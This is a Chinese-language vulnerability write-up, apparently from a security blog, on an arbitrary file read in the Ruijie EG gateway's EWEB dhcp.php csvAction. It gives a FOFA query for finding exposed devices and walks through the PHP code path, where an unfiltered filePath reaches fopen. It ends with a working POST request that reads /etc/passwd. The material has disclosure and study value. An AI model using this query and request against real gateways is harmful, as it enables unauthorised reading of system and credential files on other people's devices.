锐捷-EWEB dhcp.php 文件读取漏洞


漏洞简介

锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。锐捷EG易网关 dhcp.php 的 csvAction 存在任意文件读取漏洞,攻击者可以利用该漏洞读取设备上任意文件内容,造成敏感信息泄露。

影响版本

<=2022.07.28.01

fofa语法

title="锐捷网络-EWEB网管系统" || app="Ruijie-EG易网关" && body="/login.php?a=version"

漏洞分析

直接看 ddi/server/dhcp.php 中的 csvAction 方法实现

public function csvAction() {
        $filePath = p('filePath');
        uses("PHPExcel.php");
        $objReader = new PHPExcel_Reader_CSV();
        $objReader->setDelimiter(',');
        $objReader->setInputEncoding('GBK');
        $objReader->setEnclosure('"');
        $objReader->setLineEnding("\r\n");
        $objReader->setSheetIndex(0);
        $objPHPExcel = $objReader->load($filePath);

跟进 PHPExcel_Reader_CSV 的 load 方法

public function load($pFilename)
    {
        // Create new PHPExcel
        $objPHPExcel = new PHPExcel();

        // Load into this instance
        return $this->loadIntoExisting($pFilename, $objPHPExcel);
    }

跟进 loadIntoExisting 方法

public function loadIntoExisting($pFilename, PHPExcel $objPHPExcel)
    {
        $lineEnding = ini_get('auto_detect_line_endings');
        ini_set('auto_detect_line_endings', true);

        // Open file
        $this->_openFile($pFilename);
        if (!$this->_isValidFormat()) {
            fclose ($this->_fileHandle);

继续跟进 _openFile 方法

protected function _openFile($pFilename)
    {
        // Check if file exists
        if (!file_exists($pFilename) || !is_readable($pFilename)) {
            throw new PHPExcel_Reader_Exception("Could not open " . $pFilename . " for reading! File does not exist.");
        }

        // Open file
        $this->_fileHandle = fopen($pFilename, 'r');
        if ($this->_fileHandle === FALSE) {
            throw new PHPExcel_Reader_Exception("Could not open file " . $pFilename . " for reading.");
        }
    }

可以看到,最终是直接将无任何过滤和校验 post 获取的 filePath 直接带入 fopen 函数中进行文件操作,导致任意文件读取漏洞。

漏洞复现

POST /ddi/server/dhcp.php?a=csv HTTP/1.1
Host: ruijieweb.mrxn.net
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=xxxxxxxxxxl855hve3xxxxxxxx
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

filePath=/etc/passwd

成功读取到 /etc/passwd 文件内容


手机扫码阅读

用友U8 CRM objectview.php SQL注入漏洞

锐捷-EWEB ipam.php 文件读取漏洞

评 论